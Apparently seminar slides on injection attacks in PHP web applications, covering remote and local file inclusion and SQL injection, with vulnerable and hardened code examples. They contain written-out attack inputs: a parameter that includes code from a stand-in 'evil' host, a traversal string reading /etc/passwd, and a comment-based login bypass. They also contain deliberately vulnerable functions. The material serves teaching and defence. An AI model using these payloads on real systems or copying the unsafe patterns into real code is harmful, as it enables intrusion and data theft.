Master Semminar Injection Exploits
Examples:
/vulnerable.php?COLOR=http://evil/exploit? - includes a remotely hosted file containing an exploit (remote file inclusion).
/vulnerable.php?COLOR=../../../../../../../../etc/passwd%00 - lets an attacker read the contents of the passwd file on a UNIX system through directory traversal (local file inclusion).
%00 is the URL-encoded NULL byte; it terminates the string, so the .php suffix that the script appends to the parameter is dropped and the raw path is used.
Remote file inclusion
RFI is a very common exploit in various CMSs and other applications that provide plugin systems, download and upload many files, etc.
Even many commercial CMSs were vulnerable to RFI.
Remote file inclusion – how to defend
Remove instructions that include files whose names are taken directly from variables; use a prepared set of possible files instead (selected with conditional instructions).
Grant read privileges on the server only for the files the website needs.
On some server systems (e.g. BSD-like), use jails for the server filesystem.
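The first defence above, shown as an added example (not code from the seminar slides): the include-from-parameter pattern that the COLOR examples abuse, next to a version that treats the parameter only as a key into a prepared set of files. The theme file names and directory are assumptions.

```php
<?php
// Added example, not from the seminar slides. Theme file names are assumptions.

// VULNERABLE: the include path is built directly from user input, so
// COLOR=http://evil/exploit? or COLOR=../../../../etc/passwd%00 reaches include().
function render_theme_unsafe(string $color): void
{
    include $color . '.php';
}

// HARDENED: the parameter is only a key into a prepared set of files.
// Anything not in the set falls back to the default theme, so no part of
// the user-supplied value ever becomes part of a filesystem path or URL.
const THEME_FILES = [
    'red'  => __DIR__ . '/themes/red.php',
    'blue' => __DIR__ . '/themes/blue.php',
];

function resolve_theme(string $color): string
{
    return THEME_FILES[$color] ?? THEME_FILES['blue'];
}

function render_theme_safe(string $color): void
{
    include resolve_theme($color);
}

// Usage: the raw query parameter is passed in, but only the allowlist decides
// which file is included.
render_theme_safe($_GET['COLOR'] ?? 'blue');
```

The lookup table is the "prepared set of possible files" from the slide; a switch statement over the parameter achieves the same thing. Note that the remote variant of the attack additionally depends on the php.ini setting allow_url_include, which is off by default in current PHP releases, so keeping it off is a second, independent layer next to the allowlist.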
SQL Injection
What's that?
The most popular injection exploit.
Every application that uses an SQL-based database might be vulnerable.
However, if there is no SQL, there is no danger.
It happens when user input is not properly validated and escaped.
SQL Injection - example
We want to create a simple login form. The user provides a login and password, and we check whether such a user exists in the database. However, the user provides data which is a control instruction for the database. The user gets logged in without providing the correct password.
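The login check described above, as an added example that is not part of the seminar slides: first built by string concatenation, then with a prepared statement so that user input can only ever be compared as a value. The users table, its columns and the in-memory SQLite database are constructed for the demo.

```php
<?php
// Added example, not from the seminar slides. Table and column names are
// assumptions; the SQLite database and its single row are constructed here.

// VULNERABLE: user input is pasted into the query text. A login value
// ending in a quote and a comment marker turns the rest of the WHERE
// clause into a comment, so the password is never compared.
function login_unsafe(PDO $db, string $user, string $pass): bool
{
    $sql = "SELECT id FROM users WHERE login = '$user' AND password = '$pass'";
    $row = $db->query($sql)->fetch();
    return $row !== false;
}

// HARDENED: the query text is fixed and parsed before any user data is
// bound, so the login can only match as a literal value. The password is
// checked against a stored hash rather than compared in SQL.
function login_safe(PDO $db, string $user, string $pass): bool
{
    $stmt = $db->prepare('SELECT password_hash FROM users WHERE login = :login');
    $stmt->execute([':login' => $user]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row !== false && password_verify($pass, $row['password_hash']);
}

// Constructed demo database: one user with a plaintext column (only so the
// unsafe variant can run) and a properly hashed column for the safe one.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT, password TEXT, password_hash TEXT)');
$ins = $db->prepare('INSERT INTO users (login, password, password_hash) VALUES (?, ?, ?)');
$ins->execute(['admin', 's3cret', password_hash('s3cret', PASSWORD_DEFAULT)]);

$injected = "admin' -- ";
var_dump(login_unsafe($db, $injected, 'wrong'));  // bool(true): logged in with no valid password
var_dump(login_safe($db, $injected, 'wrong'));    // bool(false): no user is literally named "admin' -- "
var_dump(login_safe($db, 'admin', 's3cret'));     // bool(true): normal login still works
```

The difference to watch for is where the user data meets the SQL parser: in login_unsafe it is part of the statement text, in login_safe it is sent separately as a bound parameter. Escaping the input would also block this particular payload, but the prepared statement removes the whole class of problem instead of chasing individual characters.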
SQL Injection – possible effects